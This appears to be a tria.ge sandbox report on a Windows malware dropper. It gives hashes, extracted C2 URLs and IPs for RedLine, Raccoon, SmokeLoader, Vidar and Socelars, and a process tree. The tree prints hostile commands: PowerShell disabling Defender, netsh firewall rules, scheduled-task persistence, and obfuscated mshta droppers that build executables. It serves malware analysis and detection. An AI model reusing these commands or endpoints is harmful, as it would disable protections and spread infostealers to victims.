Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
10/11/2021, 14:50
211110-r7nbvaeddr 1008/11/2021, 16:12
211108-tnmmbahgaj 1008/11/2021, 15:26
211108-svdsbaccf6 1008/11/2021, 14:48
211108-r6lfvshdfn 10Analysis
-
max time kernel
45s -
max time network
176s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
10/11/2021, 14:50
General
-
Target
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
-
Size
4.7MB
-
MD5
0cc50985a2e8ae4f126dabb4b6a1c2be
-
SHA1
4d20dd812a0b2d47f4b9b511538125a1ad5d917c
-
SHA256
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef
-
SHA512
9916db8f6dcc3532d3f205d3d96154cdb511ac3b135a874f72f47be251feeedc3a83b9304f132b1e680b48b2d820dd88a2692cc1080baf88be4ffcb45d2cc439
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
Family
raccoon
Botnet
2f2ad1a1aa093c5a9d17040c8efd5650a99640b5
Attributes
-
url4cnc
http://telegatt.top/oh12manymarty
http://telegka.top/oh12manymarty
http://telegin.top/oh12manymarty
https://t.me/oh12manymarty
rc4.plain
rc4.plain
Extracted
Family
redline
Botnet
media18
C2
91.121.67.60:2151
Extracted
Family
redline
Botnet
Chris
C2
194.104.136.5:46013
Extracted
Family
redline
Botnet
fucker2
C2
135.181.129.119:4805
Extracted
Family
smokeloader
Version
2020
C2
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
48.1
Botnet
937
Attributes
-
profile_id
937
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Executes dropped EXE 20 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 9 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Kills process with taskkill 5 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
-
Suspicious use of AdjustPrivilegeToken 41 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19879c4c0e.exeTue19879c4c0e.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19325eb008c0b950.exeTue19325eb008c0b950.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\V7X6VYqX5V5LFU4W8LpDXitt.exe"C:\Users\Admin\Pictures\Adobe Films\V7X6VYqX5V5LFU4W8LpDXitt.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\bhQiFy2X3TYQeVoxQTsvJTyt.exe"C:\Users\Admin\Pictures\Adobe Films\bhQiFy2X3TYQeVoxQTsvJTyt.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\9Rj_hcz7ehVfRh2WqVOsMsm0.exe"C:\Users\Admin\Pictures\Adobe Films\9Rj_hcz7ehVfRh2WqVOsMsm0.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Pr7mdxtxeAOtkbhSZ_crHpYb.exe"C:\Users\Admin\Pictures\Adobe Films\Pr7mdxtxeAOtkbhSZ_crHpYb.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\VBMvnYNWTcDcLyzsXlz4FVzM.exe"C:\Users\Admin\Pictures\Adobe Films\VBMvnYNWTcDcLyzsXlz4FVzM.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\iYbe7ihc91pID9iAvOEnswvy.exe"C:\Users\Admin\Pictures\Adobe Films\iYbe7ihc91pID9iAvOEnswvy.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\iYbe7ihc91pID9iAvOEnswvy.exe"C:\Users\Admin\Pictures\Adobe Films\iYbe7ihc91pID9iAvOEnswvy.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\N0Qq8Bniep6dVIT39Uye2e8j.exe"C:\Users\Admin\Pictures\Adobe Films\N0Qq8Bniep6dVIT39Uye2e8j.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 6287⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 6487⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 6047⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 6087⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Yaff3jY_QOOMPNf7k0H2wCJn.exe"C:\Users\Admin\Pictures\Adobe Films\Yaff3jY_QOOMPNf7k0H2wCJn.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\Documents\rVQ3iwaCCuQDQ6MuVpyIJVqi.exe"C:\Users\Admin\Documents\rVQ3iwaCCuQDQ6MuVpyIJVqi.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\Q5y_PQ5PPuAl9CJv3YfACGqv.exe"C:\Users\Admin\Pictures\Adobe Films\Q5y_PQ5PPuAl9CJv3YfACGqv.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\TLYxRxR0rwX_ZoP6X0r0foZS.exe"C:\Users\Admin\Pictures\Adobe Films\TLYxRxR0rwX_ZoP6X0r0foZS.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\guUGZjw0mWvJondBzOKjduNp.exe"C:\Users\Admin\Pictures\Adobe Films\guUGZjw0mWvJondBzOKjduNp.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\7EiDYPDw5jEzrty1Ps6FWIrw.exe"C:\Users\Admin\Pictures\Adobe Films\7EiDYPDw5jEzrty1Ps6FWIrw.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\MnUu8RWsaVpA79NYCbjOiICC.exe"C:\Users\Admin\Pictures\Adobe Films\MnUu8RWsaVpA79NYCbjOiICC.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\sL3CMb97SJs0Se9o3FzXb8eh.exe"C:\Users\Admin\Pictures\Adobe Films\sL3CMb97SJs0Se9o3FzXb8eh.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\JHJL7ld9z5DumFQjWnNALn2a.exe"C:\Users\Admin\Pictures\Adobe Films\JHJL7ld9z5DumFQjWnNALn2a.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\aMBKOdPYM5xhw7abLZGwiXbR.exe"C:\Users\Admin\Pictures\Adobe Films\aMBKOdPYM5xhw7abLZGwiXbR.exe"8⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\GLKZsl7sJDfPFBKV9TL8izf5.exe"C:\Users\Admin\Pictures\Adobe Films\GLKZsl7sJDfPFBKV9TL8izf5.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\JH8o2zAq0ed2IYVGNRdXvQxc.exe"C:\Users\Admin\Pictures\Adobe Films\JH8o2zAq0ed2IYVGNRdXvQxc.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\EppCoislXwecaOWumm858K4q.exe"C:\Users\Admin\Pictures\Adobe Films\EppCoislXwecaOWumm858K4q.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\EppCoislXwecaOWumm858K4q.exe"C:\Users\Admin\Pictures\Adobe Films\EppCoislXwecaOWumm858K4q.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\c6Q0y7tWzy7Rm3M9l87JCR55.exe"C:\Users\Admin\Pictures\Adobe Films\c6Q0y7tWzy7Rm3M9l87JCR55.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\4hbxtprHTRQiiyAwjFvrmODP.exe"C:\Users\Admin\Pictures\Adobe Films\4hbxtprHTRQiiyAwjFvrmODP.exe"6⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WyhHpkYH1yPwTIGZyHcrmxcy.exe"C:\Users\Admin\Pictures\Adobe Films\WyhHpkYH1yPwTIGZyHcrmxcy.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\WyhHpkYH1yPwTIGZyHcrmxcy.exe"C:\Users\Admin\Pictures\Adobe Films\WyhHpkYH1yPwTIGZyHcrmxcy.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\h7hgWtGM73LKaUORtLdXO0pb.exe"C:\Users\Admin\Pictures\Adobe Films\h7hgWtGM73LKaUORtLdXO0pb.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\c40UkjlwfxCpVZUSKPxriPF3.exe"C:\Users\Admin\Pictures\Adobe Films\c40UkjlwfxCpVZUSKPxriPF3.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\B8rur4KEo7govCPz2U89FVa0.exe"C:\Users\Admin\Pictures\Adobe Films\B8rur4KEo7govCPz2U89FVa0.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\q0Kw7qHk_oiWwDY6B43OmoiW.exe"C:\Users\Admin\Pictures\Adobe Films\q0Kw7qHk_oiWwDY6B43OmoiW.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\q0Kw7qHk_oiWwDY6B43OmoiW.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\qEpo5rFv31fDMcyCtigOtKRe.exe"C:\Users\Admin\Pictures\Adobe Films\qEpo5rFv31fDMcyCtigOtKRe.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\XjsjIyTgOfYmT7bMPiGHFhc8.exe"C:\Users\Admin\Pictures\Adobe Films\XjsjIyTgOfYmT7bMPiGHFhc8.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\yODb9ukxYuaFzSOVXSdysOvm.exe"C:\Users\Admin\Pictures\Adobe Films\yODb9ukxYuaFzSOVXSdysOvm.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\8073670.exe"C:\Users\Admin\AppData\Roaming\8073670.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\3720904.exe"C:\Users\Admin\AppData\Roaming\3720904.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Roaming\7231029.exe"C:\Users\Admin\AppData\Roaming\7231029.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\1721470.exe"C:\Users\Admin\AppData\Roaming\1721470.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\1633119.exe"C:\Users\Admin\AppData\Roaming\1633119.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\3859059.exe"C:\Users\Admin\AppData\Roaming\3859059.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\2918008.exe"C:\Users\Admin\AppData\Roaming\2918008.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\2918008.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\2918008.exe"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\2918008.exe"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\2918008.exe" ) do taskkill /F /Im "%~Nxk"9⤵
-
C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXEkStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"12⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE ( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH & CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V> 8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH & CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"13⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "13⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /Im "2918008.exe"10⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\EMnfMXPdPGlMgInVCLgXVSO3.exe"C:\Users\Admin\Pictures\Adobe Films\EMnfMXPdPGlMgInVCLgXVSO3.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\6FTfQCcRuKws2MIxmjYaIBR2.exe"C:\Users\Admin\Pictures\Adobe Films\6FTfQCcRuKws2MIxmjYaIBR2.exe"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \8⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\k8xP7MwLGHaQCH2_AK0w8snC.exe"C:\Users\Admin\Pictures\Adobe Films\k8xP7MwLGHaQCH2_AK0w8snC.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\k8xP7MwLGHaQCH2_AK0w8snC.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\k8xP7MwLGHaQCH2_AK0w8snC.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\k8xP7MwLGHaQCH2_AK0w8snC.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\k8xP7MwLGHaQCH2_AK0w8snC.exe" ) do taskkill -im "%~NxK" -F8⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "12⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"12⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY12⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "k8xP7MwLGHaQCH2_AK0w8snC.exe" -F9⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\OvyxnRZ3fxqzoWbQNMa8IeRt.exe"C:\Users\Admin\Pictures\Adobe Films\OvyxnRZ3fxqzoWbQNMa8IeRt.exe"6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue195c40958f528163.exeTue195c40958f528163.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue195c40958f528163.exeC:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue195c40958f528163.exe6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19f51bcd77a.exeTue19f51bcd77a.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19f51bcd77a.exeC:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19f51bcd77a.exe6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19c06f159e0ec.exeTue19c06f159e0ec.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 12206⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue1993b3f72c.exeTue1993b3f72c.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19411ac950924ec3f.exeTue19411ac950924ec3f.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19c78ded4d176ac.exeTue19c78ded4d176ac.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19c1338f41ab.exeTue19c1338f41ab.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19761b3b8d9d.exeTue19761b3b8d9d.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19761b3b8d9d.exeC:\Users\Admin\AppData\Local\Temp\7zS0A1D5D06\Tue19761b3b8d9d.exe6⤵
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 6124⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe4⤵
-
-
